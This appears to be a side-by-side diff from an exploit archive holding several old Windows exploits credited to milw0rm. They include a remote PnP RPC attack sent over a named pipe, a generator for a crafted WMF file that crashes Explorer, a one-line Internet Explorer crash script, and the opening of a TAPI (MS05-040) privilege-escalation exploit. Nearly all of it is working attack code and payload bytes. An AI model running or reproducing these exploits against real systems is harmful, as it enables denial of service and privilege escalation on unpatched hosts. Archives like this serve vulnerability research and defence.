0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00 0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00
}; };
int main(int argc, char* argv[]) int main(int argc, char* argv[])
{ {
char szServerName[MAX_PATH]; char szServerName[MAX_PATH];
char szPipe[MAX_PATH]; char szPipe[MAX_PATH];
HANDLE hFile; HANDLE hFile;
NETRESOURCE nr; NETRESOURCE nr;
if (argc < 2){ if (argc < 2){
printf("[-] Usage: %s <host>\n", argv[0]); printf("[-] Usage: %s <host>\n", argv[0]);
return -1; return -1;
} }
if ( strlen(argv[1]) > (MAX_PATH - 50) ) { if ( strlen(argv[1]) > (MAX_PATH - 50) ) {
printf("[-] Host name %s is too long !\n"); printf("[-] Host name %s is too long !\n");
return -1; return -1;
} }
printf("[+] Start connect host %s ... \n", argv[1]); printf("[+] Start connect host %s ... \n", argv[1]);
wsprintf( szServerName, "\\\\%s\\pipe", argv[1] ); wsprintf( szServerName, "\\\\%s\\pipe", argv[1] );
nr.dwType = RESOURCETYPE_ANY; nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL; nr.lpLocalName = NULL;
nr.lpRemoteName = szServerName; nr.lpRemoteName = szServerName;
nr.lpProvider = NULL; nr.lpProvider = NULL;
if ( WNetAddConnection2(&nr, "", "", 0) != NO_ERROR ) { if ( WNetAddConnection2(&nr, "", "", 0) != NO_ERROR ) {
printf("[-] Connect to host %s failed !\n", argv[1]); printf("[-] Connect to host %s failed !\n", argv[1]);
return -1; return -1;
} }
_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", argv[1]); _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", argv[1]);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL); OPEN_EXISTING, 0, NULL);
if ( hFile == INVALID_HANDLE_VALUE ) { if ( hFile == INVALID_HANDLE_VALUE ) {
printf("[-] Open name pipe %s failed !\n", szPipe); printf("[-] Open name pipe %s failed !\n", szPipe);
return -1; return -1;
} }
unsigned char szOutBuffer[0X1000]; unsigned char szOutBuffer[0X1000];
unsigned long nBytesRead; unsigned long nBytesRead;
printf("[+] Start bind RPC interface ... \n"); printf("[+] Start bind RPC interface ... \n");
// bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B} // bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B}
if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString), if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) { szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n"); printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile); CloseHandle(hFile);
return -1; return -1;
} }
// send rpc request to call PNP_GetDeviceList (opnum 10) // send rpc request to call PNP_GetDeviceList (opnum 10)
printf("[+] Start send RPC request ... \n"); printf("[+] Start send RPC request ... \n");
if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString), if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) { szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n"); printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile); CloseHandle(hFile);
return -1; return -1;
} }
printf("[+] Attack host %s complete !\n", argv[1]); printf("[+] Attack host %s complete !\n", argv[1]);
return 0; return 0;
} }
// milw0rm.com [2005-10-21] // milw0rm.com [2005-10-21]

222
platforms/windows/dos/1346.c
View file

@ -1,111 +1,111 @@
/* /*
* Author: Winny Thomas * Author: Winny Thomas
* Pune, INDIA * Pune, INDIA
* *
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen * The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000. * when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the * The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed. * hotfix for GDI (MS05-053) installed.
* *
* Disclaimer: This code is for educational/testing purposes by authorized persons on * Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear * networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code. * any responsibility for any damage caused by using this code.
* *
*/ */
#include <stdio.h> #include <stdio.h>
unsigned char wmfheader[] = unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03" "\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6" "\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mtType "\x01\x00" //mtType
"\x09\x00" //mtHeaderSize "\x09\x00" //mtHeaderSize
"\x00\x03" //mtVersion "\x00\x03" //mtVersion
"\xff\xff\xff\x7f" //mtSize "\xff\xff\xff\x7f" //mtSize
"\x00\x00" //mtNoObjects "\x00\x00" //mtNoObjects
"\xff\xff\xff\xff" //mtMaxRecord "\xff\xff\xff\xff" //mtMaxRecord
"\x00\x00"; "\x00\x00";
unsigned char metafileRECORD[] = unsigned char metafileRECORD[] =
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02" "\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02"
"\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00" "\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01" "\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x08\x00\x00\x00\xfa\x02" "\x00\x00\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01" "\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03" "\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03"
"\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02" "\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02"
"\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb" "\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb"
"\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00" "\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02" "\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02"
"\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00" "\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00"
"\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00" "\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00"
"\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00" "\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00" "\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00"
"\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe" "\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe"
"\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01" "\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01" "\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01"
"\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00" "\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00" "\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00"
"\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00" "\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00"
"\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03" "\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03"
"\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00" "\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00"
"\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00" "\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01" "\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01" "\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01"
"\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe" "\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe"
"\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00" "\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00" "\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34" "\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34"
"\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00" "\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00"
"\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00" "\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00"
"\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06" "\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06"
"\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00" "\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00" "\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00" "\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00" "\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb" "\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00" "\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00" "\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00" "\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x03\x00"; "\x00\x00\xf0\x01\x00\x00\x03\x00";
unsigned char wmfeof[] = unsigned char wmfeof[] =
"\x00\x00\x00\x00"; "\x00\x00\x00\x00";
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
FILE *fp; FILE *fp;
int metafilesizeW, recordsizeW; int metafilesizeW, recordsizeW;
char wmfbuf[2048]; char wmfbuf[2048];
int metafilesize, recordsize, i, j; int metafilesize, recordsize, i, j;
metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3; metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2; metafilesizeW = metafilesize/2;
recordsize = sizeof (metafileRECORD) -1; recordsize = sizeof (metafileRECORD) -1;
recordsizeW = recordsize/2; recordsizeW = recordsize/2;
memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4); memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4);
memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4); memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4);
printf("[*] Adding Metafile header\n"); printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) { for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i]; (unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
} }
printf("[*] Adding metafile records\n"); printf("[*] Adding metafile records\n");
for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) { for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) {
wmfbuf[j] = metafileRECORD[i]; wmfbuf[j] = metafileRECORD[i];
} }
printf("[*] Setting EOF\n"); printf("[*] Setting EOF\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) { for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i]; wmfbuf[j] = wmfeof[i];
} }
printf("[*] Creating Metafile (MS053.wmf)\n"); printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb"); fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp); fwrite(wmfbuf, 1, metafilesize, fp);
fclose(fp); fclose(fp);
} }
// milw0rm.com [2005-11-30] // milw0rm.com [2005-11-30]

4
platforms/windows/dos/1838.html
View file

@ -20,5 +20,5 @@
</del> </del>
</h2> </h2>
</dir> </dir>
</ul> </ul>
# milw0rm.com [2006-05-27] # milw0rm.com [2006-05-27]

6
platforms/windows/dos/931.html
View file

@ -14,6 +14,6 @@
<SCRIPT> <SCRIPT>
try{window.open().document.appendChild(document.all[0]);}catch(e){} try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT> </SCRIPT>
# milw0rm.com [2005-04-12] # milw0rm.com [2005-04-12]

6
platforms/windows/dos/942.c
View file

@ -139,6 +139,6 @@ void banner()
"\t\t Yuri Gushin <yuri@eclipse.org.il>\n" "\t\t Yuri Gushin <yuri@eclipse.org.il>\n"
"\t\t Alex Behar <alex@eclipse.org.il>\n" "\t\t Alex Behar <alex@eclipse.org.il>\n"
"\t\t\t ECL Team\n\n\n"); "\t\t\t ECL Team\n\n\n");
} }
// milw0rm.com [2005-04-17] // milw0rm.com [2005-04-17]

630
platforms/windows/local/1584.cpp
View file

@ -1,315 +1,315 @@
// by Cesar Cerrudo - Argeniss - www.argeniss.com // by Cesar Cerrudo - Argeniss - www.argeniss.com
// //
// TAPI Vulnerability- MS05-040 // TAPI Vulnerability- MS05-040
// //
// Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language // Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language
// If Telephony Service is not running you can start it by net start "Telephony Service" // If Telephony Service is not running you can start it by net start "Telephony Service"
#include "windows.h" #include "windows.h"
#include "stdio.h" #include "stdio.h"
#include "tapi.h" #include "tapi.h"
typedef struct _UNICODE_STRING { typedef struct _UNICODE_STRING {
USHORT Length; USHORT Length;
USHORT MaximumLength; USHORT MaximumLength;
PWSTR Buffer; PWSTR Buffer;
} UNICODE_STRING; } UNICODE_STRING;
typedef struct LpcSectionMapInfo{ typedef struct LpcSectionMapInfo{
DWORD Length; DWORD Length;
DWORD SectionSize; DWORD SectionSize;
DWORD ServerBaseAddress; DWORD ServerBaseAddress;
} LPCSECTIONMAPINFO; } LPCSECTIONMAPINFO;
typedef struct LpcSectionInfo { typedef struct LpcSectionInfo {
DWORD Length; DWORD Length;
HANDLE SectionHandle; HANDLE SectionHandle;
DWORD Param1; DWORD Param1;
DWORD SectionSize; DWORD SectionSize;
DWORD ClientBaseAddress; DWORD ClientBaseAddress;
DWORD ServerBaseAddress; DWORD ServerBaseAddress;
} LPCSECTIONINFO; } LPCSECTIONINFO;
#define SHARED_SECTION_SIZE 0x1000 #define SHARED_SECTION_SIZE 0x1000
typedef struct _OBJDIR_INFORMATION { typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName; UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName; UNICODE_STRING ObjectTypeName;
BYTE Data[1]; BYTE Data[1];
